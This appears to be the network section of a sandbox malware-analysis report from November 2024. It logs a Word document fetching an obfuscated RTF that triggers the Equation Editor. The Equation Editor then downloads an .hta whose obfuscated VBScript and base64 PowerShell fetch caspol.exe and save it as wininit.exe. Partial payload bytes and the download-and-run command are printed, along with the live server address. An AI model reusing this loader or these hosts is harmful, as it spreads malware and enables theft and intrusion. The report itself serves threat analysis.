Nov 20, 2024 10:13:17.017268896 CET	80	49276	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:17.017319918 CET	49276	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:17.022243023 CET	80	49276	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:17.903618097 CET	80	49276	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:17.903681993 CET	80	49276	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:17.903806925 CET	49276	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:17.903897047 CET	49276	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:17.908765078 CET	80	49276	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:18.044982910 CET	49277	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:18.050030947 CET	80	49277	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:18.050131083 CET	49277	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:18.051748037 CET	49277	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:18.056602001 CET	80	49277	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:18.056701899 CET	49277	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:18.061819077 CET	80	49277	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:18.831449032 CET	80	49277	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:18.831497908 CET	80	49277	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:18.831569910 CET	49277	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:18.831645012 CET	49277	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:18.840853930 CET	80	49277	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:18.972600937 CET	49278	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:18.977886915 CET	80	49278	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:18.977967024 CET	49278	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:18.979660034 CET	49278	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:18.985649109 CET	80	49278	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:18.985728025 CET	49278	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:18.991456985 CET	80	49278	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:19.881263971 CET	80	49278	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:19.881369114 CET	49278	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:19.881414890 CET	80	49278	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:19.881458998 CET	49278	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:19.886547089 CET	80	49278	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:20.013690948 CET	49279	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:20.021190882 CET	80	49279	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:20.021389008 CET	49279	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:20.023081064 CET	49279	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:20.030540943 CET	80	49279	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:20.030600071 CET	49279	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:20.038060904 CET	80	49279	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:20.786156893 CET	80	49279	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:20.786261082 CET	49279	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:20.786345959 CET	80	49279	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:20.786398888 CET	49279	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:20.791119099 CET	80	49279	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:21.121294975 CET	49280	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:21.126986027 CET	80	49280	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:21.128859997 CET	49280	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:21.130464077 CET	49280	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:21.135622025 CET	80	49280	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:21.135704994 CET	49280	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:21.142750978 CET	80	49280	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:21.864723921 CET	80	49280	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:21.865251064 CET	80	49280	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:21.865362883 CET	49280	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:21.865447998 CET	49280	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:21.870501041 CET	80	49280	94.156.177.41	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 10:11:02.410587072 CET	54562	53	192.168.2.22	8.8.8.8
Nov 20, 2024 10:11:02.437133074 CET	53	54562	8.8.8.8	192.168.2.22
Nov 20, 2024 10:11:04.042215109 CET	52917	53	192.168.2.22	8.8.8.8
Nov 20, 2024 10:11:04.050035000 CET	53	52917	8.8.8.8	192.168.2.22
Nov 20, 2024 10:11:04.051914930 CET	62751	53	192.168.2.22	8.8.8.8
Nov 20, 2024 10:11:04.066126108 CET	53	62751	8.8.8.8	192.168.2.22
Nov 20, 2024 10:11:08.334944963 CET	57893	53	192.168.2.22	8.8.8.8
Nov 20, 2024 10:11:08.346334934 CET	53	57893	8.8.8.8	192.168.2.22
Nov 20, 2024 10:11:08.347850084 CET	54821	53	192.168.2.22	8.8.8.8
Nov 20, 2024 10:11:08.356476068 CET	53	54821	8.8.8.8	192.168.2.22
Nov 20, 2024 10:11:09.434897900 CET	54719	53	192.168.2.22	8.8.8.8
Nov 20, 2024 10:11:09.442229033 CET	53	54719	8.8.8.8	192.168.2.22
Nov 20, 2024 10:11:09.443550110 CET	49881	53	192.168.2.22	8.8.8.8
Nov 20, 2024 10:11:09.471152067 CET	53	49881	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 20, 2024 10:11:02.410587072 CET	192.168.2.22	8.8.8.8	0xa46e	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:04.042215109 CET	192.168.2.22	8.8.8.8	0xe24d	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:04.051914930 CET	192.168.2.22	8.8.8.8	0xaf7f	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:08.334944963 CET	192.168.2.22	8.8.8.8	0x1100	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:08.347850084 CET	192.168.2.22	8.8.8.8	0x2664	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:09.434897900 CET	192.168.2.22	8.8.8.8	0xd97e	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:09.443550110 CET	192.168.2.22	8.8.8.8	0x9c5b	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 20, 2024 10:11:02.437133074 CET	8.8.8.8	192.168.2.22	0xa46e	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:04.050035000 CET	8.8.8.8	192.168.2.22	0xe24d	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:04.066126108 CET	8.8.8.8	192.168.2.22	0xaf7f	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:08.346334934 CET	8.8.8.8	192.168.2.22	0x1100	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:08.356476068 CET	8.8.8.8	192.168.2.22	0x2664	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:09.442229033 CET	8.8.8.8	192.168.2.22	0xd97e	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 20, 2024 10:11:09.471152067 CET	8.8.8.8	192.168.2.22	0x9c5b	No error (0)	provit.uk	198.244.140.41	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

provit.uk

66.63.187.231

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49167	66.63.187.231	80	3292	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:12.726342916 CET	493	OUT	GET /xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 66.63.187.231 Connection: Keep-Alive
Nov 20, 2024 10:11:13.454144001 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:11:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Wed, 20 Nov 2024 01:43:14 GMT ETag: "3ecb0-6274e45e8a3e9" Accept-Ranges: bytes Content-Length: 257200 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 0d 09 09 09 09 7b 5c 2a 5c 70 6e 61 69 75 34 37 32 36 33 32 38 32 30 20 5c 22 7d 0d 7b 5c 36 34 32 30 33 39 35 39 32 39 35 39 38 5f 26 3d 29 40 3f 3d 37 28 40 30 36 3f 33 25 25 27 28 3f 3f 2d 27 3e 60 31 3c 2e 24 30 27 38 7c 60 5f 5b b0 3f 30 5d 25 5f a7 3a 40 26 5e 38 a7 2e 31 b0 7c b5 b0 34 33 3f 3e 5f 39 36 3f 3d 3f 21 b5 25 3d 23 3f 25 7e 2f 3b 21 2b 28 2c 23 5e 25 60 24 21 21 3f 30 3f 21 5d 25 3c 30 2d 30 30 3e 29 21 b0 34 33 7c 3f 36 24 2e 3f 3a 24 23 5b 24 b5 3e 39 3a 5e 5e 26 24 b5 2a 3c 2f 35 7e 2d 28 2c 5d 3a 5e 2a 33 3c 3b 3b 37 21 2b 35 2f 5e b0 3f 3b 24 2d 3c 28 a7 33 a7 3d 37 31 5b 3f 3f a7 38 36 2b 30 36 3b 24 27 38 34 35 2a 3f 3c 28 3f 36 40 60 21 5f 37 3f 2c 40 3b 2d 40 26 2d 33 25 5f 26 2d 39 26 24 25 30 5f 25 21 3a 3f 27 3f 5b 60 3a 3f 39 26 2f 3f 26 3f 31 60 a7 33 2e 3f 27 37 25 3f 38 3d 5f 60 37 30 29 34 3f 2d 36 5b 30 24 35 60 60 a7 7c 7c 25 7e 2b 24 32 a7 36 28 29 2f 30 3d 2e 31 30 2e 39 a7 2e 3f 23 38 36 3c 3f 25 37 2a 5f 3e 3a 31 3f 3f 5f 2f [TRUNCATED] Data Ascii: {\rtf1{\\pnaiu472632820 \"}{\6420395929598_&=)@?=7(@06?3%%'(??-'>`1<.$0'8\|`_[?0]%_:@&^8.1\|43?>_96?=?!%=#?%~/;!+(,#^%`$!!?0?!]%<0-00>)!43\|?6$.?:$#[$>9:^^&$</5~-(,]:^3<;;7!+5/^?;$-<(3=71[??86+06;$'845?<(?6@`!_7?,@;-@&-3%_&-9&$%0_%!:?'?[`:?9&/?&?1`3.?'7%?8=_`70)4?-6[0$5``\|\|%~+$26()/0=.10.9.?#86<?%7_>:1??_/2~4)+5(%^#149:.^=7+&'`.4?/11?_+0=%`+~:?'[?%^#?4=,,_`\|??.$6#%>&>;)+4?9?0?~&-`'??8)8%.<'=.#9#3-'5:$%%[6[:1##.@=&3&=5`5??8/-8&[^?=?.\|^/?&~(]/#<~9[8??4]+%@@%.2-64><1>`(70?\|8`$?1,~[^8?0)?=;,?#>:9=%;?%=^0<$9)%&-4([&`?448\|2[;+~<7#-<67]651470.`[??=)01+@12~#['3?=7??0+~?,&88[?%],23$'[?,3%>@-&??%??[3+1.@@=!193)%?<([%.?%:)(/:9[$??&-4[?!#2;8:4=2]-%^+'=?+!$?26^%:\|'`:_)/~\|;]/]6'/-@2?~2.?#:'%&-5%~5/[.^84??(.\|^:[@7=8]!'7<(\|?\|1^.`#\|-^80?3?3\|#??\|\|~.7$#8;?.#7=?%&?=[$92(_@?([)~$`99,#66)/2]_`?@#8]<@([?:;&7'$8>![3!?%1;/08)=<`:$06.3?3\|,0$>~:.[%,?~&?)
Nov 20, 2024 10:11:13.454161882 CET	224	IN	Data Raw: 7c 25 3a 27 3f 35 5d 5d 3e 34 2b 39 23 28 34 2d 2f 5d 3f 29 34 5f 29 33 21 2a b0 37 26 24 3f 3f 3f 3f 3b 25 3f 3d 35 30 b5 5d 37 5f 25 27 30 26 3b 3f 32 5f 24 24 2b 7e 34 5b 32 2a 21 5e 3f 23 2c 24 3f 5d 21 2d 34 29 27 24 3d 3e 31 3c 36 33 27 b0 Data Ascii: \|%:'?5...4+9#(4-/]?)4_)3!7&$????;%?=50]7_%'0&;?2_$$+~4[2!^?#,$?]!-4)'$=>1<63'-<^85/??,.7>%^;[\|4,?[9235.~\|$?]#_?@,?8^=?>%]`[_>~.?^@]=?#$>0?6,%~`[%???<,<;>](_1@!]<1???(;7&=1:)9;)??:%-(.^9\|^:#\|;;^8&:;`[$086:'^,
Nov 20, 2024 10:11:13.454174995 CET	1236	IN	Data Raw: 3c 37 3f 5f 27 32 21 25 30 33 7e 3b 5b 3f 32 32 5f 2a 5d 7c 3d 3f 3b 37 2e 3f 23 24 2c 25 3f 5b 28 30 3b 5d 21 25 7c 24 28 3e 2d 2f 60 3f 40 2f b0 a7 26 b5 29 3b 40 2f 3a 21 5d 32 3c 3f 36 a7 2f 28 25 26 2f 33 2e 3d 3f 33 b5 5b 30 31 5e 3f 32 39 Data Ascii: <7?_'2!%03~;[?22_]\|=?;7.?#$,%?[(0;]!%\|$(>-/`?@/&);@/:!]2<?6/(%&/3.=?3[01^?29`^<9&?_=#.`8^>1&_?])?6<;?(%`.9?!;(2~!339%2#`%!-\|%4`?,23@^~$@?:0%6;2.,%#9?%%~#>@-?&:`&=80@_\|<2(>*(',:(%,>7%65?[6\|;:<%<(?>@6??4?].9%+_3:0~)#+%673
Nov 20, 2024 10:11:13.454328060 CET	1236	IN	Data Raw: 40 21 3b 32 33 5b 25 2b 3b 3a 60 5e 2a 31 3f 32 b0 7e 35 38 60 7c 26 3f 3f 5e 25 3f 34 3f 28 60 3e 27 30 2b 23 5b 37 29 3f 3c b0 3f 3f 36 31 3f 36 3f 5e 2b 7c 35 33 5d 38 38 b5 34 32 b0 b5 26 3f 3a 3f 39 3b 5b 23 40 2e 2c 40 2c 3f 60 3b 21 2f a7 Data Ascii: @!;23[%+;:`^1?2~58`\|&??^%?4?(`>'0+#[7)?<??61?6?^+\|53]8842&?:?9;[#@.,@,?`;!/=43@`~(?4?!&-5?%46(.%;'@!354>~/??:&%]4</=)5?;?;;?)4`_5<1)<:9^9235=4!<?<?_+'>+;?5,1&)2'`]@??,!(_~?-?;(2?\|$6?8/7@:0/$%)1!(?^17?6;>!7&,/1?^63$(;<=;1
Nov 20, 2024 10:11:13.454339981 CET	1236	IN	Data Raw: 5e 33 3e 28 3f 3b 3b 3f 30 3b 3b 2a 2e 36 26 36 b0 a7 38 25 21 2b 26 3f 34 3d 2e 33 31 3f 5d 26 23 40 2b b5 24 23 3b 31 3d 5b 3f 3f 5f 23 27 7c 7e 7e 2c 30 23 23 35 7e 32 2a 37 3f 33 33 3f 36 31 7e 27 27 7c 2e 7e 23 2a b0 39 3f 35 3f 3f 2a a7 25 Data Ascii: ^3>(?;;?0;;.6&68%!+&?4=.31?]&#@+$#;1=[??_#'\|~~,0##5~27?33?61~''\|.~#9?5??%707!8?<^<'?7/0=,$7`+%~>20>?/#<-../?(?@/^>#0'44@<8_8\|->?:?\|;-)4'.?2'4:!-?68?/$5]0<4!?__~35716_@_>??!:3#/:)048>%#.!??.%4$?-$6?%[%(&:%3~))?2,/(%3\|':\|05/6,&+
Nov 20, 2024 10:11:13.454349995 CET	672	IN	Data Raw: 2a 5f 2b 3b 3c 34 30 28 37 5d 3c 27 3b 2d 5e 3c 24 2d 3f 38 3f 3d 3f 7e 25 2a 2a 5b 30 5d 27 b0 33 38 40 7c 25 3f 5b 25 3f 60 30 28 b5 2d 25 5d 29 5e 30 5d 36 60 b5 39 3f 29 3f 25 37 27 21 2a 30 31 b0 5b b0 35 2c 32 31 28 5e 25 3f 38 3f 30 2c 32 Data Ascii: _+;<40(7]<';-^<$-?8?=?~%[0]'38@\|%?[%?`0(-%])^0]6`9?)?%7'!01[5,21(^%?8?0,2??,~51+<.)_0)1,[[>1?2]]/%?\|.?__9`?28?7=??28)9-),2?#7$@&%7?.7?[\|``?3>-%+,6[?9??2\|??#&,^3~7(~!'?)_[;2@#./!%\|>?(?)%~?$&6]_\|?!~^;:49;?*_7:.?)~]?^;5^5,^,[&<
Nov 20, 2024 10:11:13.454540968 CET	1236	IN	Data Raw: 61 74 61 39 30 35 35 33 30 7b 5c 2a 5c 61 75 6c 77 39 30 33 36 30 32 31 37 38 20 5c 62 69 6e 30 30 30 5c 31 35 36 33 36 38 34 38 39 34 30 36 33 37 34 33 39 30 7d 0d 7b 5c 2a 5c 75 70 72 33 30 37 35 33 37 39 36 38 20 5c 62 69 6e 30 30 30 30 5c 39 Data Ascii: ata905530{\\aulw903602178 \bin000\156368489406374390}{\\upr307537968 \bin0000\979391212265309150}\paperh680587349947323\themelang9778670749\'
Nov 20, 2024 10:11:13.454551935 CET	224	IN	Data Raw: 20 20 09 20 09 09 09 20 09 09 09 20 09 09 09 20 09 09 09 20 20 20 09 20 20 09 20 09 20 20 09 20 09 20 09 09 20 20 20 20 20 20 09 09 20 20 09 20 20 20 20 09 09 09 09 09 20 20 09 09 20 09 09 09 09 20 20 20 09 20 64 35 20 20 09 20 20 09 20 09 09 09 Data Ascii: d5 8
Nov 20, 2024 10:11:13.454710960 CET	1236	IN	Data Raw: 09 09 09 09 09 09 20 20 20 09 20 36 09 20 09 09 09 20 09 09 09 20 20 20 20 20 20 20 20 09 20 20 20 20 09 09 09 09 09 20 09 20 09 20 09 09 20 20 09 09 09 09 09 20 20 20 20 09 20 09 09 20 20 20 20 20 20 20 09 09 09 09 20 09 09 09 09 09 09 09 20 09 Data Ascii: 6 e 6
Nov 20, 2024 10:11:13.454721928 CET	1236	IN	Data Raw: 20 20 20 09 09 20 20 09 09 20 20 20 09 20 20 09 20 09 20 20 20 20 09 20 30 0a 0a 0a 0a 0a 0a 0d 0d 0a 0d 0a 0d 0d 0d 0d 0d 0a 0a 0a 0a 0d 0a 0d 0d 0a 0d 0d 0d 0d 0d 0a 0d 0d 0d 0d 0a 30 30 20 20 20 09 09 09 09 20 09 09 20 09 09 20 09 20 09 09 09 Data Ascii: 000 001
Nov 20, 2024 10:11:13.460696936 CET	1236	IN	Data Raw: 09 20 09 09 09 09 09 20 20 09 09 09 20 09 09 20 20 09 20 09 20 20 20 09 20 20 20 20 20 09 09 20 09 20 09 20 09 09 20 20 09 09 20 09 20 20 20 09 09 09 20 09 09 09 09 09 20 09 20 09 20 09 09 09 20 20 20 09 09 20 20 09 20 30 30 09 20 09 20 20 20 09 Data Ascii: 00 00000000
Nov 20, 2024 10:11:15.016913891 CET	282	OUT	HEAD /xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 66.63.187.231 Content-Length: 0 Connection: Keep-Alive
Nov 20, 2024 10:11:15.250508070 CET	322	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:11:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Wed, 20 Nov 2024 01:43:14 GMT ETag: "3ecb0-6274e45e8a3e9" Accept-Ranges: bytes Content-Length: 257200 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49169	66.63.187.231	80	3752	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:16.208429098 CET	363	OUT	GET /xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 66.63.187.231 Connection: Keep-Alive
Nov 20, 2024 10:11:16.946014881 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:11:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Wed, 20 Nov 2024 01:52:14 GMT ETag: "5c04-6274e6620b225" Accept-Ranges: bytes Content-Length: 23556 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 53 63 52 69 70 54 20 4c 41 4e 47 75 61 67 45 3d 22 76 42 73 63 52 49 70 54 22 3e 0d 0a 44 49 6d 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 [TRUNCATED] Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><ScRipT LANGuagE="vBscRIpT">DImtzHLdKvsEcRWyQFPNHoyTeRtKqrFUgUlAoRyLWkDbyxAAzslucnYWlBayRmyLBfwwVLvflcYiZZEpfzNUcHCcwlZBMnkhugupWLqSGPRjiRWzLULwlRXTOODbDPFQNUvpSkWIiuwlAwrOtAtidmZdngahQoxtJqNCmFehSLdxChEPdkYlgmxnXjGbbfCAhnKlFqCZNLZaRvxkRURPVoeiRQJQNIGSlJCzyNdRVnAdTGK
Nov 20, 2024 10:11:16.946032047 CET	224	IN	Data Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ,
Nov 20, 2024 10:11:16.946044922 CET	1236	IN	Data Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: suiePMvPIuVcNMhTeJ
Nov 20, 2024 10:11:16.946078062 CET	1236	IN	Data Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: tzHLdKvsEcRW
Nov 20, 2024 10:11:16.946090937 CET	448	IN	Data Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii:
Nov 20, 2024 10:11:16.946259975 CET	1236	IN	Data Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ChrW(&H77)
Nov 20, 2024 10:11:16.946274042 CET	1236	IN	Data Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii:
Nov 20, 2024 10:11:16.946477890 CET	448	IN	Data Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii:
Nov 20, 2024 10:11:16.946549892 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 43 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 65 56 Data Ascii: 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x
Nov 20, 2024 10:11:16.946562052 CET	1236	IN	Data Raw: 67 49 43 41 67 49 43 42 4d 57 56 42 6f 63 47 5a 61 56 6d 67 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 74 55 47 46 7a 63 31 52 6f 63 6e 55 37 49 43 41 67 49 Data Ascii: gICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLD
Nov 20, 2024 10:11:16.951093912 CET	1236	IN	Data Raw: 46 71 43 5a 4e 4c 5a 61 52 76 78 6b 52 55 52 50 56 6f 65 69 52 51 4a 51 4e 49 47 53 6c 4a 43 7a 79 4e 64 52 56 6e 41 64 54 47 4b 2e 72 55 6e 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: FqCZNLZaRvxkRURPVoeiRQJQNIGSlJCzyNdRVnAdTGK.rUn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49170	66.63.187.231	80	3876	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:11:24.287302971 CET	313	OUT	GET /33/caspol.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 66.63.187.231 Connection: Keep-Alive
